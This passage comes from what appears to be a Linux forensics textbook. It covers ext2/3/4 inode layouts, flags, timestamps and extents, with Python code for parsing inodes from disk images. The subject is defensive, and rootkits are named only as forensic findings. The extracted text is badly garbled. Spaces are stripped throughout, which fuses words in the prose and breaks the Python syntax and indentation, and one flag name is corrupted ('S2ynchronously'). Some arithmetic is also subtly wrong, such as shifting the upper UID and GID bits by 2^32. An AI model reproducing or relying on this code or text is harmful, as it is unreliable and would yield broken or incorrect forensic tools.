Aftertheifblock(whichisonlyrununtilwefindourfirstfile),thelineq=$(echo$line|awk‘{print$1}’)setsthevalueofqequaltotheinodenumberforthecurrent line. If startinode is less than the current inode number, a warning message isprinted. The nestedif/else statement is used to print amessage in red if the inodenumber jumpedupbymore than two.Otherwise themessage is printed in yellow.Thefunny characters in the echo statements are called escape sequences. The -e option toechoisneededtohaveechoevaluatetheescapesequences(whichbeginwith\e)ratherthanjustprintouttherawcharacters.Ifthemessagewasdisplayed,thestartinodevariableisresettothecurrentinodenumber.
Regardlessofwhetherornotamessagewasprinted,thelineisechoed.Thestartinodevariableisincrementedonthelinestartinode=$((startinode+1)).Recall that$(())isusedtocausebashtoevaluatewhatiscontainedintheparenthesesinmathmode.This iswhywehad todeclarestartinodeasan integerearlier in thescript.Only integer
values can be incremented like this.When the loop exits, the temporary file is deleted.Partial results of running this script against the PFE subject system’s /bin directory areshowninFigure7.19.Noticetheredwarningsbeforetherootkitfiles.
FIGURE7.19
Partial results of running out-of-seq-inode.sh against the PFE subject system’s /bin directory. Note thewarningfortherootkitfiles.
INODESNowthatwehavehadalittlebreakfromtheoryandhadourfunwithsomescripting,itistimetogetbacktolearningmoreaboutthekeepersofthemetadata,theinodes.Forext2andext3filesystemstheinodesare128byteslong.Asofthiswritingtheext4filesystemuses156byte inodes,but it allocates256byteson thedisk.This extra100bytes is forfutureexpansionandmayalsobeusedforstorageaswewillseelaterinthischapter.
In order to use inodes youmust first find them. The block group associatedwith aninodeiseasilycalculatedusingthefollowingformula:
blockgroup=(inodenumber–1)/(inodespergroup)
Obviouslyintegerdivisionshouldbeusedhereasblockgroupsareintegers.Oncethecorrectblockgrouphasbeenlocated,theindexwithintheblockgroupsinodetablemustbecalculated.Thisiseasilydonewiththemodulusoperator.Recallthatxmodygivestheremainderwhenperformingtheintegerdivisionx/y.Theformulafortheindexissimply:
index=(inodenumber–1)mod(inodespergroup)
Finally,theoffsetintotheinodetableisgivenby:
offset=index*(inodesizeondisk)
The inode structure is summarized in Table 7.5. Most of these fields are self-explanatory.Thosethatarenotwillbedescribedinmoredetailinthissection.
Therearetwooperatingsystemdependentunions(OSDs)intheinode.ThesewillvaryfromwhatisdescribedhereifyourfilesystemcomesfromHurdorBSD.ThefirstOSDforfilesystemscreatedbyLinuxholdstheinodeversion.ForextendedfilesystemscreatedbyLinux,thesecondOSDcontainstheupper16bitsofseveralvalues.
Theblockarraystoresfifteen32-bitblockaddresses.If thiswasusedtodirectlystoreblocks that make up a file, it would be extremely limiting. For example, if 4-kilobyteblocksareinuse,fileswouldbelimitedto60kilobytes!Thisisnothowthisarrayisused,however.Thefirsttwelveentriesaredirectblockentrieswhichcontaintheblocknumbersforthefirsttwelvedatablocks(48kBwhenusing4kBblocks)thatmakeupafile.Ifmorespaceisrequired,thethirteenthentryhastheblocknumberforasinglyindirectblock.Thesinglyindirectblockisadatablockthatcontainsalistofdatablocksthatmakeupafile.If the block size is 4 kB the singly indirect block can point to 1024 data blocks. Themaximumamount that canbe storedusing singly indirectblocks is then (sizeof adatablock)*(numberofblockaddressesthatcanbestoredinadatablock)or(4kB)*(1024)whichequals4megabytes.
Forfilestoolargetobestoredwithdirectblocksandsinglyindirectblocks(48kB+4MB), the fourteenth entry contains the block number for a doubly indirect block. Thedoublyindirectblockpoints toablockthatcontainsa listofsingly indirectblocks.Thedoubly indirect blocks can store 1024 times as much as singly indirect blocks (againassuming4kBblocks)whichmeansthatfilesaslargeas(48kB+4MB+4GB)canbeaccommodated.Ifthisisstillnotenoughspace,thefinalentrycontainsapointertotriplyindirectblocksallowingfilesaslargeas(48kB+4MB+4GB+4TB)tobestored.ThisblocksystemisillustratedinFigure7.20.
FIGURE7.20
Datablocksininodeblockarray.
Ifyouare lookingat anext2or ext3 filesystem, then theabove listof inode fields iscomplete. For ext4 filesystems the fields in Table 7.6. have been added.Most of thesefieldsareextratimebits.
Table7.5.Inodestructure.
Offset Size Name Description
0x0 2 FileMode Filemodeandtype
0x2 2 UID Lower16bitsofownerID
0x4 4 Sizelo Lower32bitsoffilesize
0x8 4 Atime Accesstimeinsecondssinceepoch
0xC 4 Ctime Changetimeinsecondssinceepoch
0x10 4 Mtime Modifytimeinsecondssinceepoch
0x14 4 Dtime Deletetimeinsecondssinceepoch
0x18 2 GID Lower16bitsofgroupID
0x1A 2 Hlinkcount Hardlinkcount
0x1C 4 Blockslo Lower32bitsofblockcount
0x20 4 Flags Flags
0x24 4 Unionosd1 Linux:lversion
0x28 60 Block[15] 15pointerstodatablocks
0x64 4 Version FileversionforNFS
0x68 4 FileACLlow Lower32bitsofextendedattributes(ACL,etc)
0x6C 4 Filesizehi Upper32bitsoffilesize(ext4only)
0x70 4 Obsoletefragment Anobsoletedfragmentaddress
0x74 12 Osd2 Secondoperatingsystemdependentunion
0x74 2 Blockshi Upper16bitsofblockcount
0x76 2 FileACLhi Upper16bitsofextendedattributes(ACL,etc.)
0x78 2 UIDhi Upper16bitsofownerID
0x7A 2 GIDhi Upper16bitsofgroupID
0x7C 2 Checksumlo Lower16bitsofinodechecksum
Table7.6.Extrainodefieldsinext4filesystems.
Offset Size Name Description
0x80 2 Extrasize Howmanybytesbeyondstandard128areused
0x82 2 Checksumhi Upper16bitsofinodechecksum
0x84 4 Ctimeextra Changetimeextrabits
0x88 4 Mtimeextra Modifytimeextrabits
0x8C 4 Atimeextra Accesstimeextrabits
0x90 4 Crtime Filecreatetime(secondssinceepoch)
0x94 4 Crtimeextra Filecreatetimeextrabits
0x98 4 Versionhi Upper32bitsofversion
0x9C Unused Reservedspaceforfutureexpansions
Awordabout theextra timebits is inorder.Linuxisfacingaseriousproblem.In theyear 2038 the 32-bit timestampswill roll over.While that is over two decades away, asolutionisalreadyinplace(HurrayforOpenSource!).Thesolutionistoexpandthe32-bit time structure to 64 bits. In order to prevent backward compatibility problems theoriginal32-bittimestructure(storedinfirst128bytesofinodes)remainsunchanged;itisstilljustsecondssincetheepochonJanuary1,1970.Thelowertwobitsofthisextrafieldareusedtoextendthe32-bitsecondscounterto34bitswhichmakeseverythinggooduntiltheyear2446.Theupperthirtybitsoftheextrafieldareusedtostorenanoseconds.
Thisnanosecondaccuracyisadreamforforensicinvestigators.Bywayofcomparison,Windows FAT filesystems provide only a two second resolution and even the latestversionofNTFSonlyprovidesaccuracytothenearest100nanoseconds.ThisisanotherreasontousePythonandothertoolstoparsetheinodesasstandardtoolsdon’tnormallydisplaythecompletetimestamp.Thishighprecisionmakestimelineanalysiseasiersinceyoudonothavetoguesswhatchangedfirstinatwosecondinterval.
Thereareanumberofspecialinodes.ThesearesummarizedinTable7.7.Oftheinodeslisted, therootdirectory(inode2)andjournal(inode8)aresomeof themoreimportantonesforforensicinvestigators.
Table7.7.Specialpurposeinodes.
Inode SpecialPurpose
0 Nosuchinode,numberingsstartsat1
1 Defectiveblocklist
2 Rootdirectory
3 Userquotas
4 Groupquotas
5 Bootloader
6 Undeletedirectory
7 Reservedgroupdescriptors(forresizingfilesystem)
8 Journal
9 Excludeinode(forsnapshots)
10 Replicainode
11 Firstnon-reservedinode(oftenlost+found)
ReadinginodeswithPythonOnceagainwe turn toPython inorder toeasily interpret the inodedata.ToaccomplishthiswewilladdanewInodeclasstoourever-expandingextfs.pyfile.Thenewclassandhelperfunctionsfollow.“””
Thishelperfunctionparsesthemodebitvector
storedinaninode.Itacceptsa16-bitmode
bitvectorandreturnsalistofstrings.
“””
defgetInodeModes(mode):
retVal=[]
ifmode&0x1:
retVal.append(“OthersExec”)
ifmode&0x2:
retVal.append(“OthersWrite”)
ifmode&0x4:
retVal.append(“OthersRead”)
ifmode&0x8:
retVal.append(“GroupExec”)
ifmode&0x10:
retVal.append(“GroupWrite”)
ifmode&0x20:
retVal.append(“GroupRead”)
ifmode&0x40:
retVal.append(“OwnerExec”)
ifmode&0x80:
retVal.append(“OwnerWrite”)
ifmode&0x100:
retVal.append(“OwnerRead”)
ifmode&0x200:
retVal.append(“StickyBit”)
ifmode&0x400:
retVal.append(“SetGID”)
ifmode&0x800:
retVal.append(“SetUID”)
returnretVal
“””
Thishelperfunctionparsesthemodebitvector
storedinaninodeinordertogetfiletype.
Itacceptsa16-bitmodebitvectorand
returnsastring.
“””
defgetInodeFileType(mode):
fType=(mode&0xf000)>>12
iffType==0x1:
return“FIFO”
eliffType==0x2:
return“CharDevice”
eliffType==0x4:
return“Directory”
eliffType==0x6:
return“BlockDevice”
eliffType==0x8:
return“RegularFile”
eliffType==0xA:
return“SymbolicLink”
eliffType==0xc:
return“Socket”
else:
return“UnknownFiletype”
“””
Thishelperfunctionparsestheflagsbitvector
storedinaninode.Itacceptsa32-bitflags
bitvectorandreturnsalistofstrings.
“””
defgetInodeFlags(flags):
retVal=[]
ifflags&0x1:
retVal.append(“SecureDeletion”)
ifflags&0x2:
retVal.append(“PreserveforUndelete”)
ifflags&0x4:
retVal.append(“CompressedFile”)
ifflags&0x8:
retVal.append(“SynchronousWrites”)
ifflags&0x10:
retVal.append(“ImmutableFile”)
ifflags&0x20:
retVal.append(“AppendOnly”)
ifflags&0x40:
retVal.append(“DoNotDump”)
ifflags&0x80:
retVal.append(“DoNotUpdateAccessTime”)
ifflags&0x100:
retVal.append(“DirtyCompressedFile”)
ifflags&0x200:
retVal.append(“CompressedClusters”)
ifflags&0x400:
retVal.append(“DoNotCompress”)
ifflags&0x800:
retVal.append(“EncryptedInode”)
ifflags&0x1000:
retVal.append(“DirectoryHashIndexes”)
ifflags&0x2000:
retVal.append(“AFSMagicDirectory”)
ifflags&0x4000:
retVal.append(“MustBeWrittenThroughJournal”)
ifflags&0x8000:
retVal.append(“DoNotMergeFileTail”)
ifflags&0x10000:
retVal.append(“DirectoryEntriesWrittenS2ynchronously”)
ifflags&0x20000:
retVal.append(“TopofDirectoryHierarchy”)
ifflags&0x40000:
retVal.append(“HugeFile”)
ifflags&0x80000:
retVal.append(“InodeusesExtents”)
ifflags&0x200000:
retVal.append(“LargeExtendedAttributeinInode”)
ifflags&0x400000:
retVal.append(“BlocksPastEOF”)
ifflags&0x1000000:
retVal.append(“InodeisSnapshot”)
ifflags&0x4000000:
retVal.append(“SnapshotisbeingDeleted”)
ifflags&0x8000000:
retVal.append(“SnapshotShrinkCompleted”)
ifflags&0x10000000:
retVal.append(“InlineData”)
ifflags&0x80000000:
retVal.append(“ReservedforExt4Library”)
ifflags&0x4bdfff:
retVal.append(“User-visibleFlags”)
ifflags&0x4b80ff:
retVal.append(“User-modifiableFlags”)
returnretVal
“””
Thishelperfunctionwillconvertaninode
numbertoablockgroupandindexwiththe
blockgroup.
Usage:[bg,index]=getInodeLoc(inodeNo,inodesPerGroup)
“””
defgetInodeLoc(inodeNo,inodesPerGroup):
bg=(int(inodeNo)-1)/int(inodesPerGroup)
index=(int(inodeNo)-1)%int(inodesPerGroup)
return[bg,index]
“””
ClassInode.Thisclassstoresextendedfilesystem
inodeinformationinanorderlymannerandprovides
ahelperfunctionforprettyprinting.Theconstructoraccepts
apackedstringcontainingtheinodedataandinodesize
whichisdefaultedto128bytesasusedbyext2andext3.
Forinodes>128bytestheextrafieldsaredecoded.
Usageinode=Inode(dataInPackedString,inodeSize)
inode.prettyPrint()
“””
classInode():
def__init__(self,data,inodeSize=128):
#storeboththerawmodebitvectorandinterpretation
self.mode=getU16(data)
self.modeList=getInodeModes(self.mode)
self.fileType=getInodeFileType(self.mode)
self.ownerID=getU16(data,0x2)
self.fileSize=getU32(data,0x4)
#gettimesinsecondssinceepoch
#note:thesewillrolloverin2038withoutextra
#bitsstoredintheextrainodefieldsbelow
self.accessTime=time.gmtime(getU32(data,0x8))
self.changeTime=time.gmtime(getU32(data,0xC))
self.modifyTime=time.gmtime(getU32(data,0x10))
self.deleteTime=time.gmtime(getU32(data,0x14))
self.groupID=getU16(data,0x18)
self.links=getU16(data,0x1a)
self.blocks=getU32(data,0x1c)
#storeboththerawflagsbitvectorandinterpretation
self.flags=getU32(data,0x20)
self.flagList=getInodeFlags(self.flags)
#high32-bitsofgenerationforLinux
self.osd1=getU32(data,0x24)
#storethe15valuesfromtheblockarray
#note:thesemaynotbeactualblocksif
#certainfeatureslikeextentsareenabled
self.block=[]
foriinrange(0,15):
self.block.append(getU32(data,0x28+i*4))
self.generation=getU32(data,0x64)
#themostcommonextenedattributesareACLs
#butotherEAsarepossible
self.extendAttribs=getU32(data,0x68)
self.fileSize+=pow(2,32)*getU32(data,0x6c)
#thesearetechnicallyonlycorrectforLinuxext4filesystems
#shouldprobablyverifythatthatisthecase
self.blocks+=getU16(data,0x74)*pow(2,32)
self.extendAttribs+=getU16(data,0x76)*pow(2,32)
self.ownerID+=getU16(data,0x78)*pow(2,32)
self.groupID+=getU16(data,0x7a)*pow(2,32)
self.checksum=getU16(data,0x7c)
#ext4uses256byteinodesonthedisk
#asofJuly2015thelogicalsizeis156bytes
#thefirstwordisthesizeoftheextrainfo
ifinodeSize>128:
self.inodeSize=128+getU16(data,0x80)
#thisistheupperwordofthechecksum
ifself.inodeSize>0x82:
self.checksum+=getU16(data,0x82)*pow(2,16)
#theseextrabitsgivenanosecondaccuracyoftimestamps
#thelower2bitsareusedtoextendthe32-bitseconds
#sincetheepochcounterto34bits
#ifyouarestillusingthisscriptin2038youshould
#adjustthisscriptaccordingly:-)
ifself.inodeSize>0x84:
self.changeTimeNanosecs=getU32(data,0x84)>>2
ifself.inodeSize>0x88:
self.modifyTimeNanosecs=getU32(data,0x88)>>2
ifself.inodeSize>0x8c:
self.accessTimeNanosecs=getU32(data,0x8c)>>2
ifself.inodeSize>0x90:
self.createTime=time.gmtime(getU32(data,0x90))
self.createTimeNanosecs=getU32(data,0x94)>>2
else:
self.createTime=time.gmtime(0)
defprettyPrint(self):
fork,vinsorted(self.__dict__.iteritems()):
printk+”:”,v
Thefirstthreehelperfunctionsarestraightforward.Thelinereturn[bg,index]ingetInodeLocisthePythonwayofreturningmorethanonevaluefromafunction.We
havereturnedlists(usuallyofstrings)before,butthesyntaxhereisslightlydifferent.
ThereissomethingnewintheInodeclass.Wheninterpretingtheextratimestampbits,the right shiftoperator (>>)hasbeenused.Writingx>>y causes thebits inx tobeshiftedyplaces to the right.By shiftingeverything twobits to the rightwediscard thelower two bits which are used to extend the seconds counter (which should not be aproblemuntil2038)andeffectivelydivideour32-bitvaluebyfour.Theshiftoperatorsarevery fast and efficient. Incidentally, the left shift operator (<<) is used to shift bits theotherdirection(multiplication).
Ascriptnamedistat.pyhasbeencreated.ItsfunctionalityissimilartothatoftheistatutilityfromTheSleuthKit.Itexpectsanimagefile,offsettothestartofafilesysteminsectors,andaninodenumberasinputs.Thescriptfollows.#!/usr/bin/python
#
#istat.py
#
#ThisisasimplePythonscriptthatwill
#printoutmetadatainaninodefromanext2/3/4filesysteminside
#ofanimagefile.
#
#DevelopedforPentesterAcademy
#byDr.PhilPolstra(@ppolstra)
importextfs
importsys
importos.path
importsubprocess
importstruct
importtime
frommathimportlog
defusage():
print(“usage“+sys.argv[0]+\
“<imagefile><offset><inodenumber>\n”+
“Displaysinodeinformationfromanimagefile”)
exit(1)
defmain():
iflen(sys.argv)<3:
usage()
#readfirstsector
ifnotos.path.isfile(sys.argv[1]):
print(“File“+sys.argv[1]+“cannotbeopennedforreading”)
exit(1)
emd=extfs.ExtMetadata(sys.argv[1],sys.argv[2])
#getinodelocation
inodeLoc=extfs.getInodeLoc(sys.argv[3],\
emd.superblock.inodesPerGroup)
offset=emd.bgdList[inodeLoc[0]].inodeTable\
*emd.superblock.blockSize+\
inodeLoc[1]*emd.superblock.inodeSize
withopen(str(sys.argv[1]),‘rb’)asf:
f.seek(offset+int(sys.argv[2])*512)
data=str(f.read(emd.superblock.inodeSize))
inode=extfs.Inode(data,emd.superblock.inodeSize)
print“Inode%sinBlockGroup%satindex%s”%(str(sys.argv[3]),\
str(inodeLoc[0]),str(inodeLoc[1]))
inode.prettyPrint()
if__name__==“__main__”:
main()
Inthisscriptwehaveimportedtheextfs.pyfilewiththelineimportextfs.Noticethatthereisnofileextensionintheimportstatement.Thescriptisstraightforward.Weseethetypicalusagefunctionthatiscalledifinsufficientparametersarepassedintothescript.An extended metadata object is created, then the location of the inode in question iscalculated.Oncethelocationisknown,theinodedataisretrievedfromthefileandusedto create an inode object which is printed to the screen. Notice that “extfs.” must beprependedtothefunctionnamesnowthatwearecallingcodeoutsideofthecurrentfile.Wecouldavoidthisbychangingtheimportstatementtofromextfsimport*,butIdidnotdosoasIfeelhavingthe“extfs.”makesthecodeclearer.
Resultsof running thisnewscript againstoneof the interesting inodes from thePFEsubjectsystemimageareshowninFigure7.21.Acoupleofthingsaboutthisinodeshouldbenoted.First,theflagsindicatethatthisinodeusesextentswhichmeanstheblockarrayhas a different interpretation (more about this later in this chapter). Second, this inodecontains a creation time.Because this is a new field only available in ext4 filesystems,manytools,includingthoseforalteringtimestamps,donotchangethisfield.Obviously,this unaltered timestamp is good data for the forensic investigator. Now that we havelearnedaboutthegenericinodes,wearereadytomoveontoadiscussionofsomeinodeextensionsthatwillbepresentifthefilesystemhascertainfeaturesenabled.
FIGURE7.21
Resultsofrunningistat.pyonaninodeassociatedwitharootkitonthePFEsubjectsystem.
InodeextensionsanddetailsYoumayhavenoticedfromthescriptintheprevioussectionthatthefilemodebitvector
in the inode contains more that just the file mode. In addition to the standard modeinformation which may be changed via the chmod command, the type of file is alsostored.ThefilemodebitvectorissumarizedinTable7.8.
Table7.8.Filemodebitvectorfromtheinode.Boldeditemsaremutuallyexclusive.
15 14 13 12 11 10 9 8
RegularorSimlinkw/13orSocketw/14
DirectoryorBlockDevw/Bit13
CharDeviceorBlockw/Bit14
FIFO SetUID
SetGID
StickyBit
OwnerRead
7 6 5 4 3 2 1 0
OwnerWrite OwnerExecute GroupRead GroupWrite GroupExecute OthersRead OthersWrite OthersExecute
Upon examiningTable 7.8, the lower twelve bits should look familiar as all of thesemodesmaybechangedvia thestandardLinuxchmod (changemode)command.Thesefilemodesarenotmutuallyexclusive.Theupperfourbitsareusedtospecifythefiletype.Eachfileisallowedonlyonetype.ThefiletypesarebrokenoutinTable7.9.
Table7.9.Decodingthefiletypefromtheupperfourbitsoftheinodefilemode.
BitfromInodeFileMode
Meaning 15 14 13 12
FIFO(pipe) 0 0 0 1
CharacterDevice 0 0 1 0
Directory 0 1 0 0
BlockDevice 0 1 1 0
RegularFile 1 0 0 0
SymbolicLink 1 0 1 0
Socket 1 1 0 0
Theinodecontainsa32-bitbitvectorofflags.ThelowerwordofflagsissummarizedinTable 7.10. Some flags may lack operating system support. Investigators familiar withWindows may know that there is a registry flag,HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\NtfsDisableLastAccessUpdate,whichcanbeusedtodisableaccesstimeupdatingonNTFSdirectories.Bit7,noaccesstimeupdating,providesasimilarfunctiononanextendedfilesystem,butattheindividualfileordirectorylevel.
Table7.10.Lowerwordofinodeflags.
15 14 13 12 11 10 9 8
Filetailnotmerged
Datawrittenthroughjournal
AFSMagic
Directoryhashashindexes
EncyrptedInode
Don’tcompressfile
Compressedclusters
Dirtycompressedfile
7 6 5 4 3 2 1 0
Noaccesstimeupdating
NoDump
AppendOnly
Fileisimmutable
SynchronousWrites
Fileiscompressed
Preserveforundelete
SecureDeletion
The highword of inode flags is summarized in Table 7.11.Most of these flags onlymakesenseinthecontextofext4optionalfeatures.Bit28,inodehasinlinedata,isusedtostoreverysmallfilesentirelywithintheinode.Thefirst60bytesarestoredintheblockarray(whichisnotneededtostoreblocks).Ifthefilegrowsbeyond60bytesuptoabout160bytes,bytes60anduparestoredinthespacebetweeninodes(currently100bytes).Ifthefileexceeds160bytes,allofthedataismovedtoaregularblock.
Table7.11.Upperwordofinodeflags.
31 30 29 28 27 26 25 24
ReservedforExt4library
Unused Unused Inodehasinlinedata
Snapshotshrinkcompleted
Snapshotisbeingdeleted
Unused Inodeissnapshot
23 22 21 20 19 18 17 16
Unused Blockspastendoffile(deprecated)
Inodestoreslargeextendedattribute
Unused Inodeusesextents
HugeFile
Topofdirectory
Directoryentrysyncwrites
Huge files specify their size in clusters, not blocks. The cluster size is stored in thesuperblockwhen huge files are present on a filesystem.Huge files require the Extentsfeature.Extentswillbediscussedindetaillaterinthischapter.Likein-linedata,extentsusethe60bytesintheblockarrayforadifferentpurpose.Wehavesaidthataninodeisthekeeperoffilemetadata.Inthenextsectionwewilldiscusshowtoretrieveafilebasedoninformationstoredintheinode.
GoingfromaninodetoafileWehavediscussedthefifteenentriesintheblockarrayandhowtheyareusedtospecifydata blocks which house a file. We have also seen that these sixty bytes may be re-purposedforcertaincases. If the inodestoresasymbolic linkandthe target is less thansixtybyteslongitwillbestoredintheblockarray.Ifthein-linedataflagisset,thefirstsixtybytesofafileareinthisspace.Wehavealsomentionedthatextentsusethisspacedifferently.
Whenparsinganinodeforthelistofblockscontainedinafile(ordirectory)inthemostgenericsituation(i.e.noextents),weread thefirst twelveentries in theblockarrayandaddanynon-zerovaluestoourlistofblocks.Ifthethirteenthentryisnon-zero,wereadintheblockwith theaddress stored therewhichcontainsa listofup to1024blocks.Anynon-zeroentriesfromthedatablockareaddedtoourlist.Thisallowsfilesaslargeas4megabytes+48kilobytestobehandled.
Ifthereisanentryinthefourteenthblockarrayitem,weloadthespecifieddatablockwhichcontainsalistofdatablockswhichinturncontainlistsofdatablocks.Thereareupto1024*1024entriesinthisdoublyindirectlevelallofwhichpointto4kilobyteblockswhichallowfilesaslargeas4gigabytes+4megabytes+48kilobytestobehandled.Ifthis isstillnotenough, the lastentry is fora triply indirectblockwhichpermits filesaslargeas4terabytes+4gigabytes+4megabytes+48kilobytes,atleastintheory.Ifyouhaveanext4filesystem,itismuchmorelikelytouseextentswhicharediscussedinthenextsection.
Extents
Thesystemforstoringlistsofdatablocksdescribedintheprevioussectionisfinewhenmostfilesaresmall.Whenfilesizesaremeasuredinmegabytes,gigabytes,orterabytes,performancequicklybecomesanissue,however.Tobefair,theLinuxextendedfilesystemhas been around for decades and yet is perfectly acceptable as is formany users. Theelegantsolutiontoimproveperformanceforlargefilesistheuseofextents.
Extents store listsof contiguousblocks ina tree structure.Those familiarwithNTFSwillknowthatitusesalistofdataruns(contiguousclusters)inasimilarmanner.AswithmostthingsinLinux,storingblocklistsinatreeismuchmoreefficientthanthesimplelistusedinWindows.Threetypesofstructuresarerequiredtobuildanextenttree.Everyextenttreenodemusthaveaheaderthatindicateswhatisstoredinthenode.Thetopnodeofatreeisoftenreferredtoastherootnode.Therootnodeheaderisalwaysstoredatthestartoftheinodeblockarray.Allnon-emptyextenttreesmusthaveatleastoneleafnodewhich is called an extent (which is essentially equivalent to theNTFSdata run).Theremaybemiddlenodesbetweentherootnodeandleafnodeswhicharecalledindexes.Allthreetypesofstructureshavealengthof12byteswhichallowstherootnodeheaderplusfourentriestobestoredintheinodeblockarray.
TheextentheaderissummarizedinTable7.12.Theheaderbeginswithamagicnumberwhichisadouble-checkthatwhatfollowsisnotatraditionaldirectdatablockentry.Ifthedepth is zero, the entries that follow the header in this node are leaf nodes (extents).Otherwisetheentriesareforindex(middle)nodes.Ifyouworkoutthemath,storingthelargestfilesupportedbyext4shouldneverrequiremorethanfivelevelsinthetree.
Table7.12.Extentheaderformat.
Offset Size Name Description
0x0 2 Magic Magicnumber0xF30A
0x2 2 Entries Entriesthatfollowtheheader
0x4 2 MaxEntries Maximumnumberofentriesthatmightfollowheader
0x6 2 Depth 0=thisnodepointstodatablocks1-5=thisnodepointstootherotherextents
0x8 4 Generation Generationofthetree
TheextentindexnodeentryissummarizedinTable7.13.Theblockinthefirstfieldisalogicalblocknumber(thefileiscontainedinlogicalblockzerothroughtotalblocksminusone).For those familiarwithNTFS, this is similar toaVirtualClusterNumber (VCN).Theonlyrealdatainanindexnodeisa48-bitblockaddressforthenodeonelevellowerinthetree.
Table7.13.Extentindexformat.
Offset Size Name Description
0x0 4 Block Thisnodecoversblockxandfollowing
0x4 4 Leaflo Lower32bitsofblockcontainingthenode(leaforanotherindex)onelevellowerintree
0x8 2 Leafhi Upper16bitsoftheblockdescribedabove
0xA 2 Unused Paddingto12bytesize
Theextent(leaf)nodeentryissummarizedinTable7.14.Aswiththeindexnode,thefirstfieldisalogicalblocknumber.Thisisfollowedbyalength.Thislengthisnormallyless than 32,768.However, if uninitialized blocks are supported on this filesystem (saywith the lazyblockgroup feature), a valuegreater than32,768 indicates that the extentconsists of (32,768 – length) uninitialized data blocks.This is not common.The extentendswitha48-bitdatablockaddressforthefirstblockinthisextent.
Table7.14.Extentnodeformat.
Offset Size Name Description
0x0 4 Block Firstblockcoveredbythisextent
0x4 2 Len If<=32768initializedblocksinextentIf>32768extentsis(len-32768)uninitblocks
0x6 2 Starthi Upper16bitsofthestartingblock
0x8 4 Startlo Lower32bitsofthestartingblock
Basedonwhatwehavelearnedaboutextents,wecanupdateourextfs.pyandistat.pyfiles tomoreaccurately reportwhat is stored in the inodeblockarraywhenextents arebeingused. I shouldpointout that if therearemultiple levels in theextent tree that theentiretreewillnotbeprintedout,onlythefourentriesfromtheinodeblockarraywillbeincluded.Thereasonsforthisisthatparsingamulti-leveltreerequiresdatablockstoberead.Thisisnotasbigofanissueasitmightseematfirst.Fourleafnodesstoring32,768blockextentspermitfilesaslargeas32,768*4*4096or536,870,912bytes(512MB)tobestoredentirelywithintheinodeblockarray.Thefollowingcode,containingthreesmallclassesandahelperfunction,needstobeaddedtoourextfs.pyfile.“””
ClassExtentHeader.Parsesthe12-byteextent
headerthatispresentineveryextentnode
inaLinuxext4filesysteminodewiththeextent
flagset.Acceptsa12-bytepackedstring.
Usage:eh=ExtentHeader(data)
eh.prettyPrint()
“””
classExtentHeader():
def__init__(self,data):
self.magic=getU16(data)
self.entries=getU16(data,0x2)
self.max=getU16(data,0x4)
self.depth=getU16(data,0x6)
self.generation=getU32(data,0x8)
defprettyPrint(self):
print(“Extentdepth:%sentries:%smax-entries:%sgeneration:%s”\
%(self.depth,self.entries,self.max,self.generation))
“””
ClassExtentIndex.Representsamiddle
orindexnodeinanextenttree.Accepts
a12-bytepackedstringcontainingtheindex.
Usage:ei=ExtentIndex(data)
ei.prettyPrint()
“””
classExtentIndex():
def__init__(self,data):
self.block=getU32(data)
self.leafLo=getU32(data,0x4)
self.leafHi=getU16(data,0x8)
defprettyPrint(self):
print(“Indexblock:%sleaf:%s”\
%(self.block,self.leafHi*pow(2,32)+self.leafLo))
“””
ClassExtent.Representsaleafnode
orextentinanextenttree.Accepts
a12-bytepackedstringcontainingtheextent.
Usage:ext=Extent(data)
ext.prettyPrint()
“””
classExtent():
def__init__(self,data):
self.block=getU32(data)
self.len=getU16(data,0x4)
self.startHi=getU16(data,0x6)
self.startLo=getU32(data,0x8)
defprettyPrint(self):
print(“Extentblock:%sdatablocks:%s-%s”\
%(self.block,self.startHi*pow(2,32)+self.startLo,\
self.len+self.startHi*pow(2,32)+self.startLo-1))
“””
FunctiongetExtentTree(data).Thisfunction
willgetanextenttreefromthepassedin
packedstring.
Note1:Onlythedatapassedintothefunctionis
parsed.Ifthenodesareindexnodesthetreeis
nottraversed.
Note2:Inthemostcommoncasethedatapassedin
willbethe60bytesfromtheinodeblockarray.This
permitsfilesupto512MBtobestored.
“””
defgetExtentTree(data):
#firstentrymustbeaheader
retVal=[]
retVal.append(ExtentHeader(data))
ifretVal[0].depth==0:
#leafnode
foriinrange(0,retVal[0].entries):
retVal.append(Extent(data[(i+1)*12:]))
else:
#indexnodes
foriinrange(0,retVal[0].entries):
retVal.append(ExtentIndex(data[(i+1)*12:]))
returnretVal
Thiscodeusesnotechniquesthathavenotbeencoveredinthisbookthusfar.Wemustalsomodify the Inode class in order to handle the extents properly. The updated Inodeclassisshowninthefollowingcode.Newcodeisshowninbolditalics.“””
ClassInode.Thisclassstoresextendedfilesystem
inodeinformationinanorderlymannerandprovides
ahelperfunctionforprettyprinting.Theconstructoraccepts
apackedstringcontainingtheinodedataandinodesize
whichisdefaultedto128bytesasusedbyext2andext3.
Forinodes>128bytestheextrafieldsaredecoded.
Usageinode=Inode(dataInPackedString,inodeSize)
inode.prettyPrint()
“””
classInode():
def__init__(self,data,inodeSize=128):
#storeboththerawmodebitvectorandinterpretation
self.mode=getU16(data)
self.modeList=getInodeModes(self.mode)
self.fileType=getInodeFileType(self.mode)
self.ownerID=getU16(data,0x2)
self.fileSize=getU32(data,0x4)
#gettimesinsecondssinceepoch
#note:thesewillrolloverin2038withoutextra
#bitsstoredintheextrainodefieldsbelow
self.accessTime=time.gmtime(getU32(data,0x8))
self.changeTime=time.gmtime(getU32(data,0xC))
self.modifyTime=time.gmtime(getU32(data,0x10))
self.deleteTime=time.gmtime(getU32(data,0x14))
self.groupID=getU16(data,0x18)
self.links=getU16(data,0x1a)
self.blocks=getU32(data,0x1c)
#storeboththerawflagsbitvectorandinterpretation
self.flags=getU32(data,0x20)
self.flagList=getInodeFlags(self.flags)
#high32-bitsofgenerationforLinux
self.osd1=getU32(data,0x24)
#storethe15valuesfromtheblockarray
#note:thesemaynotbeactualblocksif
#certainfeatureslikeextentsareenabled
self.block=[]
self.extents=[]
ifself.flags&0x80000:
self.extents=getExtentTree(data[0x28:])
else:
foriinrange(0,15):
self.block.append(getU32(data,0x28+i*4))
self.generation=getU32(data,0x64)
#themostcommonextenedattributesareACLs
#butotherEAsarepossible
self.extendAttribs=getU32(data,0x68)
self.fileSize+=pow(2,32)*getU32(data,0x6c)
#thesearetechnicallyonlycorrectforLinuxext4filesystems
#shouldprobablyverifythatthatisthecase
self.blocks+=getU16(data,0x74)*pow(2,32)
self.extendAttribs+=getU16(data,0x76)*pow(2,32)
self.ownerID+=getU16(data,0x78)*pow(2,32)
self.groupID+=getU16(data,0x7a)*pow(2,32)
self.checksum=getU16(data,0x7c)
